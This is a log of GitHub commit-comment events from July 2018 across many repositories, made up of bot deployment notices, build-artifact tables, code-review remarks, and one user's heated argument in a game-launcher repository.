{"id":"7958536899","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-smbc-bot"},"payload":{"comment":{"id":29690693,"position":null,"line":null,"path":null,"commit_id":"d0a914a62ff3f9316bacf859abd4dc3a65e2fc9b","created_at":"2018-07-12T20:30:19Z","updated_at":"2018-07-12T20:30:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/59483139-581b-420d-90f0-d1a4f85c757d?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/60053b78-cf64-42ea-8ce3-3ba3ce629cf0?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-smbc-bot\") deployed [watsonwork-smbc-bot](https://github.com/WilliamHolmes/watsonwork-smbc-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-203017 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-203017\") to [dev](https://console.bluemix.net/apps/614b28c8-bbda-4a4b-b0da-a51b1e3ed64a?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T20:30:19Z"}
{"id":"7958539731","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Redux-Friends"},"payload":{"comment":{"id":29690702,"position":null,"line":null,"path":null,"commit_id":"d96c40486fe47c169ae31aa35fa038b202d39456","created_at":"2018-07-12T20:30:53Z","updated_at":"2018-07-12T20:30:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Set up Project](https://trello.com/c/cnWLz0by/1-set-up-project)"}},"created_at":"2018-07-12T20:30:53Z"}
{"id":"7958544086","type":"CommitCommentEvent","actor":{"login":"jordens"},"repo":{"name":"m-labs/artiq"},"payload":{"comment":{"id":29690713,"position":null,"line":null,"path":null,"commit_id":"4cfb47da8db493bac90feb8e60a4063a28a288e7","created_at":"2018-07-12T20:31:48Z","updated_at":"2018-07-12T20:31:48Z","author_association":"MEMBER","body":"Array equality is element-wise. Even if the shapes are compatible, the resulting boolean array does not automatically become a bool. I am pretty sure this will error when data is an array."}},"created_at":"2018-07-12T20:31:48Z"}
{"id":"7958545105","type":"CommitCommentEvent","actor":{"login":"gemmellr"},"repo":{"name":"gemmellr/qpid-proton-j"},"payload":{"comment":{"id":29690716,"position":72,"line":752,"path":"proton-j/src/main/java/org/apache/qpid/proton/codec/CompositeReadableBuffer.java","commit_id":"44bfb4013138d69062b2f4fb07cd4aa8225d5204","created_at":"2018-07-12T20:32:01Z","updated_at":"2018-07-12T20:32:01Z","author_association":"OWNER","body":"I pondered on that, but doing it all the time means that folks who dont want to drop the prior read data cant use the method at all. Could add a boolean to give the choice? Anyone not doing pooling is likely about to drop the entire buffer if they arent still using it. I dont think its that unreasonable folks doing pooling need to ensure theyve released it."}},"created_at":"2018-07-12T20:32:01Z"}
{"id":"7958545205","type":"CommitCommentEvent","actor":{"login":"szwenni"},"repo":{"name":"CoreELEC/CoreELEC"},"payload":{"comment":{"id":29690717,"position":null,"line":null,"path":null,"commit_id":"defe20fd2528cab85b3722b646b0ddd41cff6a21","created_at":"2018-07-12T20:32:02Z","updated_at":"2018-07-12T20:32:02Z","author_association":"NONE","body":"fakeroot_1.22 is not existent on debian servers and leads to build failure"}},"created_at":"2018-07-12T20:32:02Z"}
{"id":"7958549601","type":"CommitCommentEvent","actor":{"login":"xcompass"},"repo":{"name":"openwebwork/webwork-open-problem-library"},"payload":{"comment":{"id":29690730,"position":null,"line":null,"path":null,"commit_id":"c939bdd168c13c21f5311f90f4bd46698fb253ea","created_at":"2018-07-12T20:32:57Z","updated_at":"2018-07-12T20:32:57Z","author_association":"MEMBER","body":"Sorry, missed your comment. Yes, I think so. "}},"created_at":"2018-07-12T20:32:57Z"}
{"id":"7958549976","type":"CommitCommentEvent","actor":{"login":"adamgarza"},"repo":{"name":"adamgarza/opencensus-java"},"payload":{"comment":{"id":29690731,"position":6,"line":19,"path":"contrib/zpages/build.gradle","commit_id":"48f9df44957794e14680e7587d4865279b521251","created_at":"2018-07-12T20:33:01Z","updated_at":"2018-07-12T20:33:01Z","author_association":"OWNER","body":"@bogdandrutu I'm Adam a student participant in the GSoC2108 program. I am attempting to test an external CSS for the Rpcz Zpage and am stuck and was told you may be able to help. I want the RpczZpageHandler to have accessibility to the external CSS, but I am having problems doing this properly in the Gradle build. Could you help me out?"}},"created_at":"2018-07-12T20:33:01Z"}
{"id":"7958554942","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29690758,"position":null,"line":null,"path":null,"commit_id":"54d9edfee5785714ba27f9be3f244538a5a70b9a","created_at":"2018-07-12T20:34:08Z","updated_at":"2018-07-12T20:34:08Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux|Win|macOS|\n|---|---|---|---|\n|Blender py36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-macos64.zip)|\n|IfcConvert| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-macos64.zip)|\n|IfcGeomServer| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-macos64.zip)|\n|Python 27| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-macos64.zip)|\n|Python 27u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-54d9edf-linux64.zip)| | [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-54d9edf-macos64.zip)|\n|Python 32| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-macos64.zip)|\n|Python 32u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-54d9edf-linux64.zip)| | [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-54d9edf-macos64.zip)|\n|Python 33| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-macos64.zip)|\n|Python 34| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-macos64.zip)|\n|Python 35| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-macos64.zip)|\n|Python 36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-12T20:34:08Z"}
{"id":"7958556246","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29690766,"position":null,"line":null,"path":null,"commit_id":"e3a3123a2103277ee6dba5f813f2d7ad3dc34b12","created_at":"2018-07-12T20:34:23Z","updated_at":"2018-07-12T20:34:23Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-203422 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-203422\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T20:34:23Z"}
{"id":"7958560052","type":"CommitCommentEvent","actor":{"login":"cainaru"},"repo":{"name":"cainaru/composer-digital-initiatives"},"payload":{"comment":{"id":29690771,"position":null,"line":null,"path":null,"commit_id":"ed92e17b78f791f54d0abe96018fa9e299d4136c","created_at":"2018-07-12T20:35:10Z","updated_at":"2018-07-12T20:35:10Z","author_association":"OWNER","body":"Created multidev environment [composer-digital-initiatives#pr-46](https://dashboard.pantheon.io/sites/3d35643a-2d94-44d8-ac78-4f1526e12dcf#pr-46).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-46-composer-digital-initiatives.pantheonsite.io/)"}},"created_at":"2018-07-12T20:35:10Z"}
{"id":"7958563833","type":"CommitCommentEvent","actor":{"login":"chamons"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29690777,"position":null,"line":null,"path":null,"commit_id":"f1c90e8f1a7416107ca1f2566ecb72026ac89e0b","created_at":"2018-07-12T20:35:55Z","updated_at":"2018-07-12T20:35:55Z","author_association":"MEMBER","body":"Jenkins error is known - https://github.com/xamarin/maccore/issues/643"}},"created_at":"2018-07-12T20:35:55Z"}
{"id":"7958564446","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29690779,"position":null,"line":null,"path":null,"commit_id":"5bd9a6a4b98ac85cc689dccb981fcad942e058e1","created_at":"2018-07-12T20:36:03Z","updated_at":"2018-07-12T20:36:03Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-react](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-react).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-react-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T20:36:03Z"}
{"id":"7958573504","type":"CommitCommentEvent","actor":{"login":"hussainpaki"},"repo":{"name":"nikhildaga/fun-with-tensorflow"},"payload":{"comment":{"id":29690795,"position":null,"line":null,"path":null,"commit_id":"0d7af9dfc641ed06ac44169c7dab64cd159eca5a","created_at":"2018-07-12T20:37:50Z","updated_at":"2018-07-12T20:37:50Z","author_association":"NONE","body":"Hey nice work on the Deep Neural Network Classifier using tensorflow estimator on iris very helpful. Can you please explain how to work with Deep Neural Networks using tensorflow for traffic prediction?"}},"created_at":"2018-07-12T20:37:50Z"}
{"id":"7958574145","type":"CommitCommentEvent","actor":{"login":"Timoavax"},"repo":{"name":"Chainfire/libsuperuser"},"payload":{"comment":{"id":29690800,"position":null,"line":null,"path":null,"commit_id":"6826472529c089bd1e79417985155635c76cca28","created_at":"2018-07-12T20:37:58Z","updated_at":"2018-07-12T20:37:58Z","author_association":"NONE","body":"![up-insensitive](https://user-images.githubusercontent.com/23454607/42657974-38bfe010-8624-11e8-85f7-d3703fead3f9.png)\r\n"}},"created_at":"2018-07-12T20:37:58Z"}
{"id":"7958574603","type":"CommitCommentEvent","actor":{"login":"nafg"},"repo":{"name":"scala/scala-lang"},"payload":{"comment":{"id":29690802,"position":null,"line":null,"path":null,"commit_id":"646cbb68846038ed69e66e74e056ba394a694ab9","created_at":"2018-07-12T20:38:04Z","updated_at":"2018-07-12T20:38:04Z","author_association":"NONE","body":"I like that less -- it is important to emphasize the large end of things, albeit while not implying exclusively"}},"created_at":"2018-07-12T20:38:04Z"}
{"id":"7958577257","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690811,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:38:38Z","updated_at":"2018-07-12T20:38:38Z","author_association":"NONE","body":"Huh? I cant pay for my own servers and you can ask Broadway that he hasn't paid for me a server in months. How am i getting servers then? And how am i paying for domains bud?"}},"created_at":"2018-07-12T20:38:38Z"}
{"id":"7958581494","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690822,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:39:31Z","updated_at":"2018-07-12T20:39:31Z","author_association":"NONE","body":"And i wrote my own nirai deployment files? With working automatic push to the TSOperations github?"}},"created_at":"2018-07-12T20:39:31Z"}
{"id":"7958581517","type":"CommitCommentEvent","actor":{"login":"NatalieWolfe"},"repo":{"name":"mongodb/node-mongodb-native"},"payload":{"comment":{"id":29690823,"position":null,"line":null,"path":null,"commit_id":"b7ae8cd70c90d3c14d22708869335b31c39b148f","created_at":"2018-07-12T20:39:31Z","updated_at":"2018-07-12T20:39:31Z","author_association":"NONE","body":"Where are the instrumentation endpoints exposed now? With the removal of the `metadata` class, any APM modules that relied on it for knowing what to wrap broke. The driver documentation for Node still [references this information as available](http://mongodb.github.io/node-mongodb-native/3.1/reference/management/apm/#instrumentation).\r\n\r\nWhat are APM vendors supposed to use now to instrument Mongo?"}},"created_at":"2018-07-12T20:39:31Z"}
{"id":"7958585003","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690828,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:40:14Z","updated_at":"2018-07-12T20:40:14Z","author_association":"NONE","body":"Feel free to add me and ill show you the scratch OTP me and Leo wrote? If you cant backup your comments, dont speak."}},"created_at":"2018-07-12T20:40:14Z"}
{"id":"7958588158","type":"CommitCommentEvent","actor":{"login":"imitrichev"},"repo":{"name":"arinelya/CPP2018"},"payload":{"comment":{"id":29690836,"position":null,"line":null,"path":null,"commit_id":"696f32f12b659dd3c879c8a6148ae5410247c265","created_at":"2018-07-12T20:40:52Z","updated_at":"2018-07-12T20:40:52Z","author_association":"NONE","body":"![default](https://user-images.githubusercontent.com/6708143/42658062-dd965ad0-862c-11e8-85c7-9cf40e9aed46.png)\r\nДокументация работает"}},"created_at":"2018-07-12T20:40:52Z"}
{"id":"7958590492","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29690844,"position":null,"line":null,"path":null,"commit_id":"c800f396b5d60862ab7f4d57c595afa05a610bf0","created_at":"2018-07-12T20:41:22Z","updated_at":"2018-07-12T20:41:22Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-204121 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-204121\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T20:41:22Z"}
{"id":"7958594274","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690852,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:42:08Z","updated_at":"2018-07-12T20:42:08Z","author_association":"NONE","body":"Also what happened to your old github? What about the 'no suspensions'?"}},"created_at":"2018-07-12T20:42:08Z"}
{"id":"7958598936","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/Redux-Friends"},"payload":{"comment":{"id":29690863,"position":null,"line":null,"path":null,"commit_id":"8c4c228bb0e97ae3b4be2680f9f43566d4e0ec42","created_at":"2018-07-12T20:43:05Z","updated_at":"2018-07-12T20:43:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fetch the friends data.](https://trello.com/c/nnG0Jpf5/4-fetch-the-friends-data)"}},"created_at":"2018-07-12T20:43:05Z"}
{"id":"7958599441","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690865,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:43:11Z","updated_at":"2018-07-12T20:43:11Z","author_association":"NONE","body":"![image](https://user-images.githubusercontent.com/33942724/42658201-45354b58-85ea-11e8-9710-226f2c8d3284.png)\r\nr/stopyourbullshit"}},"created_at":"2018-07-12T20:43:11Z"}
{"id":"7958604098","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690874,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:44:07Z","updated_at":"2018-07-12T20:44:07Z","author_association":"NONE","body":"https://github.com/Internetpirate/ is also your suspended github"}},"created_at":"2018-07-12T20:44:07Z"}
{"id":"7958606945","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690883,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:44:41Z","updated_at":"2018-07-12T20:44:41Z","author_association":"NONE","body":"Also you never worked for PORewritten so how is your code?"}},"created_at":"2018-07-12T20:44:41Z"}
{"id":"7958608303","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690888,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:44:59Z","updated_at":"2018-07-12T20:44:59Z","author_association":"NONE","body":"you have no commits on any of the repos either"}},"created_at":"2018-07-12T20:44:59Z"}
{"id":"7958621961","type":"CommitCommentEvent","actor":{"login":"cacheclear"},"repo":{"name":"cacheclear/laracasts"},"payload":{"comment":{"id":29690926,"position":null,"line":null,"path":null,"commit_id":"b941f844d711c0b5f1c87ce14dd7325e074debcf","created_at":"2018-07-12T20:47:53Z","updated_at":"2018-07-12T20:47:53Z","author_association":"OWNER","body":"Using \"php artisan event:generate\" all events there listeners in the array of the \"$listen\" property (EventServiceProvider.php) will be generated automatically. The listeners are also prapared according to there event.\r\n"}},"created_at":"2018-07-12T20:47:53Z"}
{"id":"7958627052","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29690936,"position":null,"line":null,"path":null,"commit_id":"e07430be5fddd8b61d2b9dd369304f28164bf4fd","created_at":"2018-07-12T20:48:58Z","updated_at":"2018-07-12T20:48:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#ci-472](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#ci-472).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-472-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-12T20:48:58Z"}
{"id":"7958627839","type":"CommitCommentEvent","actor":{"login":"cacheclear"},"repo":{"name":"cacheclear/laracasts"},"payload":{"comment":{"id":29690940,"position":null,"line":null,"path":null,"commit_id":"0896338b7e7d01c03710b120b2ee6a4fe39fc85e","created_at":"2018-07-12T20:49:08Z","updated_at":"2018-07-12T20:49:08Z","author_association":"OWNER","body":"In this case \"php artisan make:listener CheckForSpam --event=\"ThreadCreated\"\" has been run. So the created listener is prepared according to the event its listening"}},"created_at":"2018-07-12T20:49:08Z"}
{"id":"7958629771","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29690943,"position":null,"line":null,"path":null,"commit_id":"72cfc4b297c653df8dad065e8346f05ba0d22ace","created_at":"2018-07-12T20:49:29Z","updated_at":"2018-07-12T20:49:29Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-204928 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180712-204928\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T20:49:29Z"}
{"id":"7958630171","type":"CommitCommentEvent","actor":{"login":"JustinSHong"},"repo":{"name":"JustinSHong/Graphs"},"payload":{"comment":{"id":29690944,"position":null,"line":null,"path":null,"commit_id":"db7bbb4809a2bd68873cdfb8a0a39a6985a7b178","created_at":"2018-07-12T20:49:34Z","updated_at":"2018-07-12T20:49:34Z","author_association":"OWNER","body":"I first implemented drawWeights() to draw a weight between the midpoint of two vertices.\r\n\r\nI then set up a click event listener on the canvas and set up handleVertexClick() to determine which vertex a user clicks and to console.log() the value of the vertex a user clicks."}},"created_at":"2018-07-12T20:49:34Z"}
{"id":"7958631810","type":"CommitCommentEvent","actor":{"login":"nvoster"},"repo":{"name":"zsinx6/musthe"},"payload":{"comment":{"id":29690948,"position":null,"line":null,"path":null,"commit_id":"914e0f268c5a41e0d0593836642c9eff8c0872e5","created_at":"2018-07-12T20:49:52Z","updated_at":"2018-07-12T20:49:52Z","author_association":"NONE","body":"Is there a reason toLetter is in camelCase instead of underscore_case? If not, it might be better practice to change it"}},"created_at":"2018-07-12T20:49:52Z"}
{"id":"7958632259","type":"CommitCommentEvent","actor":{"login":"NazarPtashynskyi"},"repo":{"name":"ViktoriyaRyazhska/Lv-329.JavaCore"},"payload":{"comment":{"id":29690949,"position":29,"line":29,"path":"week_three/les5/EX2/Numb.java","commit_id":"9aff0befb05f36e098cc1a338a23fd6acd831fa9","created_at":"2018-07-12T20:49:58Z","updated_at":"2018-07-12T20:49:58Z","author_association":"COLLABORATOR","body":"сорі, тут не зрозумів, що product це множити. Там тільки ввести змінну = 1 і *= "}},"created_at":"2018-07-12T20:49:58Z"}
{"id":"7958635304","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29690958,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T20:50:37Z","updated_at":"2018-07-12T20:50:37Z","author_association":"NONE","body":"****\r\n![image](https://user-images.githubusercontent.com/33942724/42658544-436fb55a-85eb-11e8-9e00-8708b3966682.png) oh whats this? Its another part of your bullshit exposed.\r\n"}},"created_at":"2018-07-12T20:50:37Z"}
{"id":"7958636534","type":"CommitCommentEvent","actor":{"login":"cacheclear"},"repo":{"name":"cacheclear/laracasts"},"payload":{"comment":{"id":29690961,"position":null,"line":null,"path":null,"commit_id":"4e1621e11cb112dca60de806c05a73b3f6845179","created_at":"2018-07-12T20:50:53Z","updated_at":"2018-07-12T20:50:53Z","author_association":"OWNER","body":"The following command in \"tinker\" can be used to test the created event:\r\nevent(new App\\Events\\ThreadCreated(['name' => \"Some new thread\"]));\r\n"}},"created_at":"2018-07-12T20:50:53Z"}
{"id":"7958639585","type":"CommitCommentEvent","actor":{"login":"vectorijk"},"repo":{"name":"apache/beam"},"payload":{"comment":{"id":29690967,"position":347,"line":604,"path":"website/src/documentation/sdks/nexmark.md","commit_id":"2ae7950328cd27330befe0e64688230c83755137","created_at":"2018-07-12T20:51:32Z","updated_at":"2018-07-12T20:51:32Z","author_association":"CONTRIBUTOR","body":"cc @echauchot @iemejia \r\nI think we don't have a gradle configuration for building fat jar which can be submitted to spark cluster. Any idea about how to build a fat jar? This command didn't work. "}},"created_at":"2018-07-12T20:51:32Z"}
